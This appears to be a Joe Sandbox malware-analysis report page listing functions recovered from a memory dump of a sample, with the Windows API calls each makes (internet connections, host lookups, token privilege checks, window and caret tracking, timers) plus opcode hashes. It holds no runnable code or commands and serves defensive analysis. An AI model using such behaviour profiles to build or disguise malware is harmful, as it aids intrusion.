__isleadbyte_l.LIBCMT ref: 00C46229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C46257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C4628D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
Instruction ID: d4d91f098c946f2cb0b31d7f01fca7d9e674b33a2acad11d1122e4710e12ebf7
Opcode Fuzzy Hash: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
Instruction Fuzzy Hash: DE31DE30600286BFDF318F65CC48BAE7BA9FF42310F154029E864971A5E770EA50DB92

Function 00C94EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C94F02

Part of subcall function 00C73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7365B
Part of subcall function 00C73641: GetCurrentThreadId.KERNEL32 ref: 00C73662
Part of subcall function 00C73641: AttachThreadInput.USER32(00000000,?,00C75005), ref: 00C73669

GetCaretPos.USER32(?), ref: 00C94F13
ClientToScreen.USER32(00000000,?), ref: 00C94F4E
GetForegroundWindow.USER32 ref: 00C94F54

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
Instruction ID: eb7b21a852ae0c26e284aaffc851f1007bae0e7ed6be3e24351ab3d786cd753e
Opcode Fuzzy Hash: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
Instruction Fuzzy Hash: ED311C71D00108AFDB10EFA5C885EEFB7FDEF99300F10406AE415E7241EA71AE459BA0

Function 00C9C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

GetCursorPos.USER32(?), ref: 00C9C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C4B9AB,?,?,?,?,?), ref: 00C9C4E7
GetCursorPos.USER32(?), ref: 00C9C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C4B9AB,?,?,?), ref: 00C9C56E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
Instruction ID: c12037d22d156108eabff7e821ff74dbb52e163f1d6ef075be98b5222c9758d8
Opcode Fuzzy Hash: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
Instruction Fuzzy Hash: AA318F35600058AFCF158F98C89CEEE7BB5EB09310F45406AF9158B2A1C731AE61EBA4

Function 00C68656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
Part of subcall function 00C6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
Part of subcall function 00C6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
Part of subcall function 00C6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C686A3
_memcmp.LIBCMT ref: 00C686C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C686FC
HeapFree.KERNEL32(00000000), ref: 00C68703

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
Instruction ID: fa569948783ea9de40e4f90032c12aae1255601535e53b35f187ede641f03d3b
Opcode Fuzzy Hash: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
Instruction Fuzzy Hash: 9421AF71E10109EFDB20DFA4C989BEEB7B9EF44304F158159E854AB240DB71EE09DB90

Function 00C3098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00C309AE

Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50

_fprintf.LIBCMT ref: 00C309E5
OutputDebugStringW.KERNEL32(?), ref: 00C65DBB

Part of subcall function 00C34AAA: _flsall.LIBCMT ref: 00C34AC3

__setmode.LIBCMT ref: 00C30A1A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
Instruction ID: a49e44ab010d1eabe67275ccf6513a7120ba90f5f894a1cce73937d00d46a481
Opcode Fuzzy Hash: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
Instruction Fuzzy Hash: 5C113A72914204AFDB08B7B4AC879FE7768DF82320F244015F105971C2EE30598677E1

Function 00C81767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C817A3

Part of subcall function 00C8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
Part of subcall function 00C8182D: InternetCloseHandle.WININET(00000000), ref: 00C818E9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
Instruction ID: c38049bb38c6b757ea4bb7fcc483d7727b519e5d5ec1fee16e8e11bacdb13982
Opcode Fuzzy Hash: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
Instruction Fuzzy Hash: 0721B031200605BFEB12AF609C05BBABBEDFB48714F15402EFD11D6591D7719912A7A8

Function 00C73A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C9FAC0), ref: 00C73A64
GetLastError.KERNEL32 ref: 00C73A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C73A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C9FAC0), ref: 00C73ADF

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
Instruction ID: 6d4998f2749193e1c765ee0c2ee59eb9f589097cbd7bad9a92dbd81b5281b699
Opcode Fuzzy Hash: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
Instruction Fuzzy Hash: B42196345082419F8700DF64C8469AA77E8AF55364F108A2DF4ADC72A1DB31DA46FB52

Function 00C450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C45101

Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c6c6c7c26ccc6f646ac6eca015f7aa90826892ef836c1fda2a2c8c51f51885b
Instruction ID: 13edf516b30ecaceb460c4bb7d6bf55e017afab16dc87bef815bdeeb64ade081
Opcode Fuzzy Hash: 5c6c6c7c26ccc6f646ac6eca015f7aa90826892ef836c1fda2a2c8c51f51885b
Instruction Fuzzy Hash: 82112572910B16AFCF312F70EC45B6E3798BF043B1F20453AF9549A162DF348A41A790

Function 00C144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C144CF

Part of subcall function 00C1407C: _memset.LIBCMT ref: 00C140FC
Part of subcall function 00C1407C: _wcscpy.LIBCMT ref: 00C14150
Part of subcall function 00C1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160

KillTimer.USER32(?,00000001,?,?), ref: 00C14524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C14533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4D4B9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
Instruction ID: 28b689c6d4744d33d60c357d80f2f97e16dc04fb143cd38ab83b8f2afbc83032
Opcode Fuzzy Hash: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
Instruction Fuzzy Hash: 1F21D7749047849FE7329B249859BEABFECAF06314F04009EE69E96281C3742A84DB51

Function 00C86369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50

gethostbyname.WSOCK32(?,?,?), ref: 00C86399
WSAGetLastError.WSOCK32(00000000), ref: 00C863A4
_memmove.LIBCMT ref: 00C863D1
inet_ntoa.WSOCK32(?), ref: 00C863DC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
Instruction ID: fc6ef54e1b00a237a5d30bde10373d65a2e187aa3645078cfa21622ed82ff5c8
Opcode Fuzzy Hash: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
Instruction Fuzzy Hash: 38116A32A00109AFCB00FBA4D996DEEB7B8AF46314B144029F506A71A1DB30AE45EB61

Function 00C68B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C68B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68BA4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
Instruction ID: 0bf4a307a42d2b0783223c42271578401e490f1a5ad941a00280c68c1ab9c052
Opcode Fuzzy Hash: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
Instruction Fuzzy Hash: EB114879900218FFEB10DFA5CC84FADBBB8FB48710F2041A5EA00B7290DA716E11DB94

Function 00C11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
GetClientRect.USER32(?,?), ref: 00C4B5FB
GetCursorPos.USER32(?), ref: 00C4B605
ScreenToClient.USER32(?,?), ref: 00C4B610

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
Instruction ID: 6093e05c8943fdc780a28df3f302bdeeaa60c5b25e83acd55e57a7c6145d6008
Opcode Fuzzy Hash: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
Instruction Fuzzy Hash: 46114F35501519EFCF10DF94D889AFE77B8FB06301F500456FA11E7140C734BA91ABA5

Function 00C71142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C71184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C711C1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
Instruction ID: 5fe38581faccbbff050cbab263b6ff1adca4508e26904a91e3b881f7d908a2d5
Opcode Fuzzy Hash: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
Instruction Fuzzy Hash: 49111831D00519D7CF009FA9D848BEEBB78FB09711F45805AEE49BA240CA7096918BD5

Function 00C6D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C6D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C6D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C6D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C6D897

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
Instruction ID: 3cea9cc6f9f50ade89539c62445402cf97d2c3360b5d212d3a247a8fafbdb548
Opcode Fuzzy Hash: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
Instruction Fuzzy Hash: 07113C75A05304DBE3308F51EC8CF96BBA8EB04B00F10856EA516D7490D7B0E9599BE1

Function 00C46FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C46FDB

Part of subcall function 00C476C2: __fltout2.LIBCMT ref: 00C476EB

__cftog_l.LIBCMT ref: 00C47001
__cftoe_l.LIBCMT ref: 00C47033

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 8e73ab37c2f9a5662a012a2a8027ab79e84fa5f27f1d9272b33d85548fe73d8f
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: FD014C7244914ABBCF265F84DC45CEE3F62BB18350F598615FE6858031D336DAB1AB81

Function 00C9B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C9B2E4
ScreenToClient.USER32(?,?), ref: 00C9B2FC
ScreenToClient.USER32(?,?), ref: 00C9B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9B33B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
